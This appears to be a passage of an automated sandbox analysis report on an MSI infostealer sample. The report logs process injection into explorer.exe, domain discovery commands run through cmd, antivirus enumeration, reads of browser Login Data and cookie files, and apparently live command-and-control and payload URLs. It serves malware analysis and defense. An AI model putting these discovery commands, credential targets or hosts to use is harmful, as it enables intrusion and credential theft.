            Source: C:\Windows\System32\rundll32.exeCode function: 4_3_00007DF496590100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,4_3_00007DF496590100
            Source: C:\Windows\System32\rundll32.exeThread created: C:\Windows\explorer.exe EIP: 2F20000Jump to behavior
            Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 2F20000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\rundll32.exeMemory written: PID: 4004 base: 2F20000 value: 4DJump to behavior
            Source: C:\Windows\System32\rundll32.exeThread register set: target process: 828Jump to behavior
            Source: C:\Windows\System32\rundll32.exeThread register set: 828 1Jump to behavior
            Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 2F20000Jump to behavior
            Source: C:\Windows\System32\net.exeMemory written: C:\Windows\System32\net1.exe base: 241E5A50000
            Source: C:\Windows\System32\net.exeMemory written: C:\Windows\System32\net1.exe base: 7D5E13A2D8
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /allJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trustsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trustsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domainJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /allJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domainJump to behavior
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
            Source: C:\Windows\System32\net.exeProcess created: unknown unknown
            Source: explorer.exe, 00000007.00000002.4597672025.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2399747098.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: explorer.exe, 00000007.00000002.4597672025.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4603373431.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2400901870.00000000048E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000007.00000002.4597672025.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2399747098.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000007.00000000.2399496894.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4587902556.0000000000D60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +Progman
            Source: explorer.exe, 00000007.00000002.4597672025.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2399747098.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000007.00000003.4387068567.00000000098E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4385567219.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2979103692.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd31A
            Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00007FFD92DB3260
            Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,4_2_00007FFD92FE09A8
            Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,4_2_00007FFD92FE08A8
            Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00007FFD92FE0F30
            Source: C:\Windows\System32\rundll32.exeCode function: __crtGetLocaleInfoEx,GetLocaleInfoW,4_2_00007FFD92DBACC0
            Source: C:\Windows\System32\rundll32.exeCode function: try_get_function,try_get_function,GetLocaleInfoW,4_2_00007FFD92DBC4B0
            Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoEx,__crtDownlevelLocaleNameToLCID,GetLocaleInfoW,4_2_00000001800354AC
            Source: C:\Windows\System32\rundll32.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,4_2_00000001800400E0
            Source: C:\Windows\System32\rundll32.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,4_2_000000018002E394
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,TestDefaultCountry,__crtGetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,__crtGetLocaleInfoEx,_invoke_watson,4_2_00000001800423EC
            Source: C:\Windows\System32\rundll32.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,__crtGetLocaleInfoEx,_calloc_crt,__crtGetLocaleInfoEx,free,__crtGetLocaleInfoEx,_invoke_watson,4_2_00000001800384A0
            Source: C:\Windows\System32\rundll32.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,4_2_000000018004064C
            Source: C:\Windows\System32\rundll32.exeCode function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,GetACP,4_2_0000000180042858
            Source: C:\Windows\System32\rundll32.exeCode function: __crtGetLocaleInfoEx,4_2_000000018004290C
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,__crtGetUserDefaultLocaleName,_invoke_watson,_invoke_watson,_getptd,_getptd,LcidFromHexString,GetLocaleInfoW,4_2_0000000180042A10
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,EnumSystemLocalesW,4_2_0000000180042D88
            Source: C:\Windows\System32\rundll32.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,4_2_0000000180040DB0
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,EnumSystemLocalesW,4_2_0000000180042E3C
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,TestDefaultLanguage,4_2_0000000180042ED0
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,TestDefaultLanguage,4_2_0000000180043100
            Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_000000018004324C
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,GetLocaleInfoW,4_2_00000001800432FC
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,_getptd,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,_getptd,EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,__crtDownlevelLCIDToLocaleName,__crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,_itow_s,4_2_00000001800433A4
            Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,4_2_00000001800353EC
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,__lc_wcstolc,__get_qualified_locale_downlevel,__get_qualified_locale,__lc_lctowcs,__crtGetLocaleInfoEx,GetACP,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,4_2_000000018003B508
            Source: C:\Windows\System32\rundll32.exeCode function: ___lc_locale_name_func,__crtGetLocaleInfoEx,4_2_00000001800298D8
            Source: C:\Windows\System32\rundll32.exeCode function: __crtGetLocaleInfoEx,malloc,__crtGetLocaleInfoEx,WideCharToMultiByte,free,4_2_00000001800419E8
            Source: C:\Windows\System32\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_0000000180041B54
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB2A60 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00007FFD92DB2A60
            Source: C:\Windows\explorer.exeCode function: 7_2_02F28D3C GetUserNameA,wsprintfA,7_2_02F28D3C
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92FD91F8 GetTimeZoneInformation,4_2_00007FFD92FD91F8
            Source: C:\Windows\explorer.exeCode function: 7_2_02F300E8 RtlGetVersion,7_2_02F300E8
            Source: C:\Windows\System32\nltest.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: WMIC.exe, 00000020.00000003.3556983352.00000280825C1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000003.3559120170.0000028081EBB000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000002.3560416857.000002808210B000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000002.3560255096.0000028081EBC000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000003.3556838679.0000028081EB3000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000003.3558898075.0000028081EC2000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000003.3558923493.0000028081EB3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pathToSignedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: WMIC.exe, 00000020.00000002.3560416857.000002808210B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gnedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: WMIC.exe, 00000020.00000002.3559501715.000000C89C097000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ndows Defender\MsMpeng.exe
            Source: WMIC.exe, 00000020.00000002.3560416857.000002808210B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: indows Defender\MsMpeng.exe
            Source: WMIC.exe, 00000020.00000002.3560075911.0000028081E77000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000002.3560164454.0000028081E9D000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000003.3558182311.00000280825A1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000003.3556707481.0000028081E98000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000003.3559327644.0000028081E77000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000003.3556838679.0000028081E9B000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000003.3558152150.00000280825A0000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000003.3556707481.0000028081E72000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
            Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara match File source: 00000004.00000003.2394515342.000001DA031BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.4600031642.000001DA0329C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.4600031642.000001DA0330C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.4597607083.000001DA0318C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7024, type: MEMORYSTR
            Source: Yara match File source: 00000007.00000002.4606571879.000000000950A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR
            Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
            Source: C:\Windows\explorer.exe Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 7_2_0B848848
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Suhba\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Go!\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Rafotech\Mustang\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\RockMelt\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Safer Technologies\Secure Browser\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Bromium\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Login Data

            Remote Access Functionality

            Source: Yara match File source: 00000004.00000003.2394515342.000001DA031BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.4600031642.000001DA0329C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.4600031642.000001DA0330C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.4597607083.000001DA0318C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7024, type: MEMORYSTR
            Source: Yara match File source: 00000007.00000002.4606571879.000000000950A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR
            Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
            Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00007FFD92DB34A0 Concurrency::details::WorkItem::BindTo,4_2_00007FFD92DB34A0
            | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
            |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
            | Gather Victim Identity Information | Acquire Infrastructure | 1 Replication Through Removable Media | 131 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
            | Credentials | Domains | Default Accounts | 1 Native API | 1 Windows Service | 1 Windows Service | 1 Deobfuscate/Decode Files or Information | 1 Credentials In Files | 11 Peripheral Device Discovery | Remote Desktop Protocol | 1 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
            | Email Addresses | DNS Server | Domain Accounts | 1 Service Execution | Logon Script (Windows) | 913 Process Injection | 2 Obfuscated Files or Information | Security Account Manager | 1 Account Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
            | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
            | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 File Deletion | LSA Secrets | 38 System Information Discovery | SSH | Keylogging | 114 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
            | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 21 Masquerading | Cached Domain Credentials | 2101 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
            | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 23 Virtualization/Sandbox Evasion | DCSync | 23 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
            | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 913 Process Injection | Proc Filesystem | 13 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
            | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Rundll32 | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
            | IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
            | Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Stripped Payloads | Input Capture | 1 Remote System Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
            | Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | Embedded Payloads | Keylogging | 21 System Network Configuration Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking |
            [Behavior graph: ID 1576900, Sample: lavita.msi, Startdate: 17/12/2024, Architecture: WINDOWS, Score: 100]

            | Source | Detection | Scanner | Label | Link |
            |---|---|---|---|---|
            | lavita.msi | 0% | ReversingLabs | | |

            | Source | Detection | Scanner | Label | Link |
            |---|---|---|---|---|
            | C:\Users\user\AppData\Roaming\gpuset\appgpuset.dll | 0% | ReversingLabs | | |
            | C:\Windows\Installer\MSIC2F1.tmp | 0% | ReversingLabs | | |
            | C:\Windows\Installer\MSIC35F.tmp | 0% | ReversingLabs | | |
            | C:\Windows\Installer\MSIC39F.tmp | 0% | ReversingLabs | | |
            | C:\Windows\Installer\MSIC3DE.tmp | 0% | ReversingLabs | | |
            No Antivirus matches
            No Antivirus matches
            | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
            |---|---|---|---|---|---|
            | bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high |
            | cronoze.com | 94.232.40.41 | true | false | | high |
            | proliforetka.com | 172.67.161.60 | true | true | | unknown |
            | muuxxu.com | 94.232.46.11 | true | false | | high |
            | dogirafer.com | 104.21.16.1 | true | true | | unknown |
            | Name | Malicious | Antivirus Detection | Reputation |
            |---|---|---|---|
            | https://dogirafer.com/test/ | true | Avira URL Cloud: malware | unknown |
            | https://proliforetka.com/test/ | true | Avira URL Cloud: safe | unknown |
            | https://dogirafer.com/files/stkm.bin | true | Avira URL Cloud: safe | unknown |
                                          high
                                          http://x1.i.lencr.org/0rundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F434000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3349191347.000001DA034F3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3349400263.000001DA031D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4597607083.000001DA031D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F425000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2394466415.000001DA7F42A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://muuxxu.com:8817/rundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://proliforetka.com/1explorer.exe, 00000007.00000003.4386958155.000000000C381000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4387199626.000000000C3A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://dogirafer.com/explorer.exe, 00000007.00000002.4615738228.000000000C3AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4386958155.000000000C381000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4387199626.000000000C3A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4587902556.0000000000D99000.00000004.00000020.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            unknown
